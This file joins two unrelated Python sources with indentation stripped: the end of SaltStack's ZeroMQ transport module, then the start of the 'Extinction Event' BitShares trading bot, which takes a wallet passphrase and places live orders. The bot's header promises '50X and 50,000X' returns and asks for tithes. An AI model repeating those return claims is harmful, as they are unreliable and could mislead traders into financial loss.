# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = salt.utils.stringutils.to_bytes(hashlib.sha1(salt.utils.stringutils.to_bytes(topic)).hexdigest())
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent')
# Syndic broadcast
if self.opts.get('order_masters'):
log.trace('Sending filtered data to syndic')
pub_sock.send(b'syndic', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent to syndic')
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
log.trace('Sending broadcasted data over publisher %s', pub_uri)
pub_sock.send(b'broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Broadcasted data has been sent')
else:
log.trace('Sending ZMQ-unfiltered data over publisher %s', pub_uri)
pub_sock.send(payload)
log.trace('Unfiltered data has been sent')
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except KeyboardInterrupt:
log.trace('Publish daemon caught Keyboard interupt, tearing down')
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.close()
if pull_sock.closed is False:
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager, kwargs=None):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
@property
def pub_sock(self):
'''
This thread's zmq publisher socket. This socket is stored on the class
so that multiple instantiations in the same thread will re-use a single
zmq socket.
'''
try:
return self._sock_data.sock
except AttributeError:
pass
def pub_connect(self):
'''
Create and connect this thread's zmq socket. If a publisher socket
already exists "pub_close" is called before creating and connecting a
new socket.
'''
if self.pub_sock:
self.pub_close()
ctx = zmq.Context.instance()
self._sock_data.sock = ctx.socket(zmq.PUSH)
self.pub_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
log.debug("Connecting to pub server: %s", pull_uri)
self.pub_sock.connect(pull_uri)
return self._sock_data.sock
def pub_close(self):
'''
Disconnect an existing publisher socket and remove it from the local
thread's cache.
'''
if hasattr(self._sock_data, 'sock'):
self._sock_data.sock.close()
delattr(self._sock_data, 'sock')
def publish(self, load):
'''
Publish "load" to minions. This send the load to the publisher daemon
process with does the actual sending to minions.
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload['topic_lst'] = match_ids
payload = self.serial.dumps(int_payload)
log.debug(
'Sending payload to publish daemon. jid=%s size=%d',
load.get('jid', None), len(payload),
)
if not self.pub_sock:
self.pub_connect()
self.pub_sock.send(payload)
log.debug('Sent payload to publish daemon.')
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs)
self._closing = False
def close(self):
if self._closing:
return
self._closing = True
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def destroy(self):
# Bacwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
This class wraps the underlying zeromq REQ socket and gives a future-based
interface to sending and recieving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The interface IP address to bind to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
self._closing = False
# TODO: timeout all in-flight sessions, or error
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, 'stream') and self.stream is not None:
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
else:
self.stream.close()
self.socket = None
self.stream = None
if self.context.closed is False:
self.context.term()
def destroy(self):
# Bacwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
log.debug('Trying to connect to: %s', self.addr)
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
@salt.ext.tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timedout
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except Exception as err: # pylint: disable=broad-except
log.debug('Re-init ZMQ socket: %s', err)
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't been already timedout
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug('SaltReqTimeoutError, retrying. (%s/%s)', future.attempts, future.tries)
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False):
'''
Return a future which will be completed when the message has a response
'''
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: %s", evt)
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
EV0.00000005.py
|
' litepresence 2018 '
def WTFPL_v0_March_1765():
if any([stamps, licenses, taxation, regulation, fiat, etat]):
try:
print('no thank you')
except:
return [tar, feathers]
# dependencies
import matplotlib
import numpy as np
from tkinter import *
# pybitshares modules
from bitshares import BitShares
from bitshares.market import Market
from bitshares.account import Account
from bitshares.blockchain import Blockchain
# standard python modules
import os
import sys
import json
import time
import math
import warnings
import requests
import websocket
import traceback
from getpass import getpass
from datetime import datetime
import matplotlib.pyplot as plt
import matplotlib.cbook as cbook
import matplotlib.dates as mdates
from ast import literal_eval as literal
from statistics import mean, median, mode
from random import random, shuffle, randint
from multiprocessing import Process, Value, Array
# Google Agorism
SATOSHI = 0.00000001
ANTISAT = 1 / SATOSHI
def banner():
print("\033c")
print('''
# EXTINCTION EVENT
# Backtesting and Live Algo Trading Framework for Bitshares DEX
' (BTS) litpresence1 '
v0.00000003_beta
Ensure what I want happens,
when I want it to happen,
and assure me it actually happened.
* featuring trustless client side Bitshares public node access *
Installation:
https://github.com/litepresence/extinction-event/blob/master/README.md
''')
time.sleep(0)
print("\033c")
print('''
Bitshares Decentralized Development April 2018
BitShares Core Release 2.0.180328
https://github.com/bitshares/bitshares-core/releases/tag/2.0.180328
PUBLIC NODES - 65 responding to east coast US; 2X in past 30 days
EASYDEX - Bitshares fiat gateway for USD and EUR
CITADEL - Bitshare UI and stealth wallet
PALMPAY - Chain Agnostic 3 Second Point of Sale App
MORPHIT - Fee Free app like shapeshift/blocktrades
LOCALBTS - Decentralized Local Bitshares to Fiat Reputation App
BENCH -
GRAPHENEJ - A Java library for mobile Bitsshares app Developers
DEXBOT - Scalping / Market Making UI
CARBON - Multichain Mobile Wallet
STEALTH - ??? sent ??? amount to ??? BTS Transactions
BTS added to HUOBI and COINTIGER exchanges
bitsharestalk.io new chat forum
apasia, leading public node provider, aquires bitshares.org
''')
time.sleep(0)
print("\033c")
print('''
running metaNODE and EV concurrently live will use:
50kbit/s upload
600kbit/s download
<2 GB RAM
4 CPU cores at <10%
Initializing EV.py live:
3 GB RAM
100% of 1 cpu for a few minutes
''')
#===================================================================
'''
March 2018:
Possible Hack Of Third-Party Tools Affects Binance Exchange Users.
: Cointelegraph
Statement on Potentially Unlawful Online Digital Asset Platforms
: SEC.gov
I stand upon the shoulders of giants and as such,
invite you to stand upon mine.
Use my work with or without attribution;
I make no claim of "intellectual property."
My ideas are the result of countless millenia of evolution
- they belong to humanity.
: Jameson Lopp @lopp
NOTE THIS IS ALPHA RELEASE TO PUBLIC DOMAIN WITH NO WARRANTY
#
# https://www.youtube.com/watch?v=5xouOnHxYUw
# https://www.youtube.com/watch?v=jJxKXOTNXjc
#
# Rated R Under 17 NOT Admitted Without Parent
#
# My liability is ZERO; "this script licenced: don't be a bitch^TM"
#
# WTFPLv0 March 1765
#
use this, get lambo, deposit 7.777% skriptbunny tithing here:
(BTS) litepresence1
(BTC) 374gjPuhokrWj8KJu8NnMBGzpbHWcVeE1k
#
# 0.05 BTC each for AI tuned to last 365 days of any alt/btc pair
# 1 BTC each for machine optimized algo for top 100 alt/btc pair
# !@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()
# this algo can be tuned to between:
# 50X and 50,000X
# in BOTH currency and asset terms
# for ANY* crypto-crypto pair, over past 365 days of data
# !@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()
# litepresence @ pastecoin.com for sales
# finitestate@tutamail for inquiries
#
########################
#
# THE DESTROYER,
# litepresence - 2018
#
'''
#===================================================================
''' FEATURES v0.00000001 alpha release March 8, 2018'''
#===================================================================
'''
ALT/BTC data from cryptocompare.com as signal
Bitshares DEX open.ALT/open.BTC for trading
- Play simple effective 4 state 50 day cross
- uses live 2h arrays to generate moving averages
- ma1xma2 is about 17x50 day simple moving average cross
- cross plus +/- threshold changes state logic from bull to bear
- Bull Logic
buy 17 day support
sell 17 day x ~1.5 selloff
- Bear logic
sell 17 day resistance
buy 17 day x ~0.75 despair
- dynamic stoploss upon market shift
- approximately 7-20 day trade frequency depending upon pair
- announces machine state on plot
- Make Markets, Close Margins, Support Trends
- Iceberg entry and exit
- Bot runs local
- Backtest Engine Included
- Maintains storage from backtest to live session
'''
#===================================================================
''' FEATURES v0.00000002 alpha April 1, 2018 '''
#===================================================================
'''
Rogue Node Immunity:
A background daemon process maintains a list of low latency nodes
for buy/sell/cancel/orders ops in a text file
distributed exchange prices and orderbook are verified and curated
using multinode statistical approach with daemon processes
open orders are checked in triplicate on multiple nodes
dex() definitions have been upgraded after consultation with
Bitshares core developers and node admin
Move to github:
https://github.com/litepresence/extinction-event
New MODES:
SALES mode backtest only plots buy/sell actions; no state machine
LATENCY mode connect to all nodes and reports on latency
PAPER mode runs live, but does not trade
'''
#===================================================================
''' FEATURES v0.00000003 dare I say beta April 20, 2018'''
#===================================================================
'''
- microDEX.py was created to monitor EV.py in realtime.
- solid doubletime week live testing and de bugging EV.py afterwards
- completely reworked all dex() calls
- reconnect() is a thing - client side wss handshake verification
- simplified scalp(), it works, enjoy
- do what I say, when I say, and announce when done: LIVE $$$ DEX'd
- new mode TEST ORDERS
- generates EV_log.py microDEX_log.py with stacktrace + buy/sell
- new easy install to virtual environment by @sschiessl
- with microDEX multinode animation and EV.py statistical curation
user and bots have VIP seats on public DEX network
'''
#===================================================================
''' FEATURES v0.00000004 beta-alt-alt-meta May 23, 2018'''
#===================================================================
'''
- metaNODE
- data curation for public database calls
- stand alone app independently watches full public network
- performs statistical analysis on data feeds
- maintains whitelisted nodes list
- acts as 'monit' type duplex watchdog to EV
- dexBOT collaboration
- metaNODE framework built to work with other bot applications
- funding earmarked for metaNODE implementation into dexBOT
- altcoin-altcoin trading via btc common base
- ie simulated STEEM:BTS pair historic backtest data
'''
#===================================================================
''' DEPENDENCIES'''
#===================================================================
'''
python 3
numpy
tkinter
matplotlib
pybitshares
*h/t @ cryptocompare.com w/ 2000+ altcoin pairs of market data
**h/t to crew at bitshares dev and node admin telegram
'''
def version():
global VERSION
#===================================================================
VERSION = 'EXTINCTION EVENT v0.00000005 beta-alt-alt-meta'
#===================================================================
print ('Python3 and Linux Required; your system:', sys.version.split(' ')[0], sys.platform)
sys.stdout.write('\x1b]2;' + VERSION + '\x07')
print('')
print(VERSION)
print('')
# USER CONTROLS
# ======================================================================
def tune_install(): # Basic User Controls
global CURRENCY, ASSET, MA1, MA2
global SELLOFF, SUPPORT, RESISTANCE, DESPAIR
global MIN_CROSS, MAX_CROSS, BULL_STOP, BEAR_STOP
global DPT, ROI, APY
global METHOD
APY = DPT = ROI = 1.0
METHOD = 0
#===================================================================
CURRENCY = "BTC"
ASSET = "BTS"
MA1 = 10
MA2 = 50
SELLOFF = 2
SUPPORT = 1
RESISTANCE = 1
DESPAIR = 0.75
MIN_CROSS = 1
MAX_CROSS = 1
BULL_STOP = 1
BEAR_STOP = 1
def control_panel(): # Advanced User Controls
global LIVE, CURRENCY, ASSET, MA1, MA2, MA3, MA4, SCALP_PIECES
global MIN_MARGIN, TICK, TICK_TIMING, TICK_MINIMUM
global CANDLE, START_ASSETS, START_CURRENCY, ORDER_TEST
global ANIMATE, STORAGE_RESET, CURRENCY_STOP, MAX_CURRENCY
global LIVE_PLOT_DEPTH, BELL, FORCE_ALPHA, PAPER, LATENCY
global DEPTH, BACKTEST, PAIR, MAX_ASSETS, SALES, SCALP_FUND
global RESOLUTION, OPTIMIZATIONS, MARKET_CROSS, OPTIMIZE, SCALP
global MANUAL_OVERRIDE, MANUAL_BUY, MANUAL_SELL, MIN_AMOUNT
# optimizer
RESOLUTION = 20
OPTIMIZATIONS = 10000
# backtest
START_ASSETS = 0
START_CURRENCY = 1
# initial backtest market state (True is "BULL")
MARKET_CROSS = True
# max percent may invest in:
# 100 = "all in" ; 10 = "10 percent in"
# to let bot do its thing with full bank use 100, 100
MAX_ASSETS = 100
MAX_CURRENCY = 100
# minimum order size in asset terms
MIN_AMOUNT = 0.01
# scalp thresholds
# ENTER OWN RISK &&&&
SCALP = True # maintain market maker iceberg margins
SCALP_PIECES = 4 # number of pieces to break up scalp orders
SCALP_FUND = 0.050 # 0.010 = 1% of holdings reserved for scalping
MIN_MARGIN = 0.025 # about 0.030
MA3 = 0.500 # about 0.500
MA4 = 0.166 # about 0.166
# force buy/sell thresholds manually
MANUAL_OVERRIDE = False
MANUAL_BUY = SATOSHI
MANUAL_SELL = ANTISAT
# Manual Override Alpha State when live
FORCE_ALPHA = False # Options: ( False, 'BULL', 'BEAR' )
# hft timing in seconds
TICK = 300
TICK_TIMING = 51
TICK_MINIMUM = 30
# backtest
ANIMATE = False
STORAGE_RESET = False
CURRENCY_STOP = False
# live window
LIVE_PLOT_DEPTH = 86400 # 86400 = 1 day
BELL = False # sound linux alarm when tick fails
# constants
CANDLE = 86400
# 0 1 2 3 4 5 6
OPTIMIZE = BACKTEST = PAPER = LIVE = SALES = LATENCY = ORDER_TEST = False
if MODE == 0:
OPTIMIZE = True
if MODE == 1:
BACKTEST = True
OPTIMIZATIONS = 0
if MODE == 2:
PAPER = True
MAX_ASSETS = 0
MAX_CURRENCY = 0
if MODE == 6:
ORDER_TEST = True
MAX_ASSETS = 0
MAX_CURRENCY = 0
if MODE in [2, 3, 6]:
LIVE = True
CANDLE = 7200
OPTIMIZATIONS = 0
print(('BOT MAY SPEND: ', MAX_ASSETS, 'PERCENT CURRENCY'))
print(('BOT MAY LIQUIDATE: ', MAX_CURRENCY, 'PERCENT ASSETS'))
print('')
print('gathering 2h candle data...')
if MODE == 4:
BACKTEST = True
SALES = True
OPTIMIZATIONS = 0
if MODE == 5:
LATENCY = True
DEPTH = int(max(MA1, MA2) * (86400 / CANDLE) + 50)
PAIR = ('%s_%s' % (CURRENCY, ASSET))
# BITSHARES DEX TRADING API
# ======================================================================
def keys_install(): # Bitshares Keys
global BitCURRENCY, BitASSET, ACCOUNT, PASS_PHRASE
global BitPAIR, MARKET, CHAIN, MODE, USERNAME, ID, LATENCY_LOOP
ID = '4018d7844c78f6a6c41c6a552b898022310fc5dec06da467ee7905a8dad512c8'
MODE = 999
print('0:OPTIMIZE, 1:BACKTEST, 2:PAPER, 3:LIVE, 4:SALES, 6: TEST ORDERS')
while MODE not in [0, 1, 2, 3, 4, 6]:
MODE = int(input('TRADING MODE: '))
print('')
if MODE ==6:
print('WARNING:')
print('This mode will repeatedly LIVE TEST buy/sell/cancel 0.1 assets on 20% spread.')
print('Monitor with microDEX.py')
print('')
if CURRENCY in ['BTS', 'USD', 'CNY']:
BitCURRENCY = CURRENCY
else:
BitCURRENCY = 'GDEX.' + CURRENCY
if ASSET in ['BTS', 'USD', 'CNY']:
BitASSET = ASSET
else:
BitASSET = 'OPEN.' + ASSET
BitPAIR = BitASSET + ":" + BitCURRENCY
if MODE in [2, 3,6]:
nodes = nodes_fetch()
shuffle(nodes)
try:
USERNAME = input(' account: ')
print('')
print('accessing account...')
print('')
ACCOUNT = Account(USERNAME,
bitshares_instance=BitShares(nodes))
except Exception as ex:
print (type(ex).__name__)
sys.exit()
if MODE in [3, 6]:
print('DO NOT ENTER PASSWORD WITHOUT READING, UNDERSTANDING,')
print('AND TAKING PERSONAL RESPONSIBILITY FOR THE CODE')
print('')
PASS_PHRASE = getpass(prompt=' pass phrase: ')
else:
PASS_PHRASE = ''
MARKET = Market(BitPAIR, bitshares_instance=BitShares(nodes), mode='head')
if MODE in [3, 6]:
try:
MARKET.bitshares.wallet.unlock(PASS_PHRASE)
print('')
print('AUTHENTICATED')
time.sleep(1)
print("\033c")
except Exception as ex:
print (type(ex).__name__)
sys.exit()
CHAIN = Blockchain(bitshares_instance=BitShares(nodes), mode='head')
ACCOUNT = MARKET = CHAIN = 0
def reconnect( # client side, validate wss handshake
BitPAIR, USERNAME, PASS_PHRASE):
# create fresh websocket connection
i = 0
while True:
try:
time.sleep(0.05 * i ** 2)
i += 1
print(time.ctime(), 'connecting, attempt:', i)
# fetch fresh nodes list from subprocess and shuffle it
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
nodes = metaNODE['whitelist']
shuffle(nodes)
node = nodes[0]
# create a temporary handshake to confirm good node
def chain_test(node, num):
try:
chain = Blockchain(
bitshares_instance=BitShares(node, num_retries=0), mode='head')
num.value = 1
except:
pass
num = Value('i', 0)
p = Process(target=chain_test, args=(node, num,))
p.daemon = False
p.start()
p.join(6)
if num.value == 0:
raise ValueError('reconnect timed out')
# create handshake
chain = Blockchain(
bitshares_instance=BitShares(node, num_retries=0), mode='head')
market = Market(BitPAIR,
bitshares_instance=BitShares(node, num_retries=0), mode='head')
account = Account(USERNAME,
bitshares_instance=BitShares(node, num_retries=0))
current_block = chain.get_current_block_num()
start = time.time()
blocktimestamp = chain.block_timestamp(current_block)
ping = time.time() - start
block_latency = start - blocktimestamp
# Confirm the connection is good
if ping > 2:
raise ValueError('ping > 2')
if block_latency > 5:
raise ValueError('block latency > 5')
if chain.get_network()['chain_id'] != ID:
raise ValueError('Not Mainnet Chain')
if float(market.ticker()['latest']) == 0:
raise ValueError('ZERO price')
break
except Exception as e:
msg = msg_(e) + str(node)
race_append(doc='EV_log.txt', text=msg)
print(time.ctime(), type(e).__name__, e.args, node)
continue
try:
market.bitshares.wallet.unlock(PASS_PHRASE)
except:
pass
print(time.time(), node, market, str(chain).split(' ')[-1])
return account, market, node, chain
def dex_auth(command, amount=ANTISAT, price=None, expiration=ANTISAT):
# insistent timed process wrapper for dex_auth2()
# covers all buy/sell/cancel pybitshares authenticated requests
# if command does not execute in time: kill process, start anew
# serves to force disconnect websockets if done; also if hung
# signal.value is switched to 0 at end of dex_auth2()
timeout = 60
signal = Value('i', 1)
i = 0
while signal.value:
i+=1
print('')
print('pybitshares authentication attempt:', i)
process = Process(target=dex_auth2,
args=(signal, command, amount, price, expiration))
process.daemon = False
process.start()
process.join(timeout)
print('pybitshares authentication terminated')
print('')
watchdog()
def dex_auth2(signal, command, amount, price, expiration):
attempt = 1
# BUY/SELL/CANCEL OPS
if amount > MIN_AMOUNT:
if command == 'buy':
# buy relentlessly until satisfied or currency exhausted
print(('Bitshares API', command, satoshi_str(amount), 'at', satoshi_str(price)))
while 1:
try:
time.sleep(0.05 * attempt ** 2)
if attempt > 1:
print('buy attempt:', attempt)
# Gather curated public data
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
last = metaNODE['last']
currency = metaNODE['currency_balance']
assets = metaNODE['asset_balance']
# Authenticate via pybitshares
account, market, node, chain = reconnect(BitPAIR, USERNAME, PASS_PHRASE)
# Final check, buy no more than 110% market price
if (price is None) or (price > 1.1*last):
price = 1.1*last
# Save last bitshare for fees
if BitCURRENCY == 'BTS':
currency -= 1
# No negative currency
currency = max(0,currency)
# means to buy is currency in hand divided by order price
means = currency/price
# order amount no more than 99.8% means
if amount > 0.998 * means:
print('not enough currency')
amount = 0.998 * means
# if order amounts to more than dust, place order
if amount > MIN_AMOUNT:
print(('order final check', command, satoshi_str(amount), 'at', satoshi_str(price)))
print('Currency: ', currency, 'Means: ', means)
print(market, price, amount, expiration)
details = (market.buy(price, amount, expiration))
print (details)
break
except Exception as e:
if 'balance' in str(e).lower():
print('Insufficient Balance')
break
else:
msg = msg_(e)
msg += ('\n\n' + str(attempt) + ' ' + ' BUY FAILED, RECONNECTING '
+ str(node) + ' ' + str(price) + ' ' + str(amount))
race_append(doc='EV_log.txt', text=msg)
print("buy attempt %s failed" % attempt)
attempt += 1
if attempt > 10:
diagnostics(level=[1,2,3])
print(("buy attempt %s WARN: ABORTED" % attempt))
break
continue
else:
print('no currency to buy')
break
if command == 'sell':
# sell relentlessly until satisfied or assets exhausted
print(('Bitshares API', command, satoshi_str(amount), 'at', satoshi_str(price)))
while 1:
try:
time.sleep(0.05 * attempt ** 2)
if attempt > 1:
print('sell attempt:', attempt)
# Gather curated public data
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
last = metaNODE['last']
currency = metaNODE['currency_balance']
assets = metaNODE['asset_balance']
# Authenticate via pybitshares
account, market, node, chain = reconnect(BitPAIR, USERNAME, PASS_PHRASE)
# Final check, sell no less than 90% market price
if (price is None) or (price < 0.9*last):
price = 0.9*last
# Final check, amount no more than 99.8% assets
if BitASSET == 'BTS':
assets -= 1 # Save last bitshare for fees
assets = max(0,assets)
if amount > 0.998 * assets:
print('not enough assets')
amount = 0.998 * assets
# Final Check, min bid size
if amount > MIN_AMOUNT:
print(('order final check', command, satoshi_str(amount), 'at', satoshi_str(price)))
details = (market.sell(price, amount, expiration))
details = str(details)
print (details)
race_append(doc='EV_log.txt', text=details)
break
except Exception as e:
if 'balance' in str(e).lower():
print('Insufficient Balance')
break
else:
msg = msg_(e)
msg += ('\n\n' + str(attempt) + ' ' + ' SELL FAILED, RECONNECTING '
+ str(node) + ' ' + str(price) + ' ' + str(amount))
race_append(doc='EV_log.txt', text=msg)
print(("sell attempt %s failed" % attempt))
attempt += 1
if attempt > 10:
diagnostics(level=[1,2,3])
print(("sell attempt %s WARN: ABORTED" % attempt))
break
continue
else:
print('no assets to sell')
break
else:
print('buy/sell request under MIN_AMOUNT')
if command == 'cancel':
# cancel reapeatedly until arrive at server with nothing to cancel
print(('Bitshares API', command))
i = 0
while 1:
try:
i+=1
time.sleep(0.05 * i ** 2)
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
orders = metaNODE['orders']
break
except:
continue
while len(orders):
time.sleep(0.05 * attempt ** 2)
if attempt > 1:
print('cancel attempt:', attempt)
try:
account, market, node, chain = reconnect(BitPAIR, USERNAME, PASS_PHRASE)
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
orders = metaNODE['orders']
i += 1
print((len(orders), 'open orders to cancel'))
order_list = []
for order in orders:
order_list.append(order['orderNumber'])
details = market.cancel(order_list)
print (details)
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print(("cancel attempt %s failed" % attempt))
attempt += 1
if attempt > 10:
diagnostics(level=[1,2,3])
print ('cancel aborted')
continue
print('no orders to cancel')
signal.value = 0
def nodes_fetch():
metaNODE = Bitshares_Trustless_Client()
return metaNODE['whitelist']
# TEXT PIPE
# ======================================================================
def Bitshares_Trustless_Client(): # creates metaNODE dictionary
# Include this definition in your script to access metaNODE.txt
# Deploy your bot script in the same folder as metaNODE.py
i = 0
while True:
try:
time.sleep(0.05 * i ** 2)
i += 1
with open('metaNODE.txt', 'r') as f:
#diagnostics(level=[1])
ret = f.read()
f.close()
try:
metaNODE = literal(ret)
break
except:
pass
try:
ret = ret.split('}')[0] + '}'
metaNODE = literal(ret)
break
except:
pass
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
msg += ' Bitshares_Trustless_Client()'
print(msg)
diagnostics(level=[1,2,3])
try:
f.close()
except:
pass
pass
finally:
try:
f.close()
except:
pass
return metaNODE
def race_read(doc=''): # Concurrent Read from File Operation
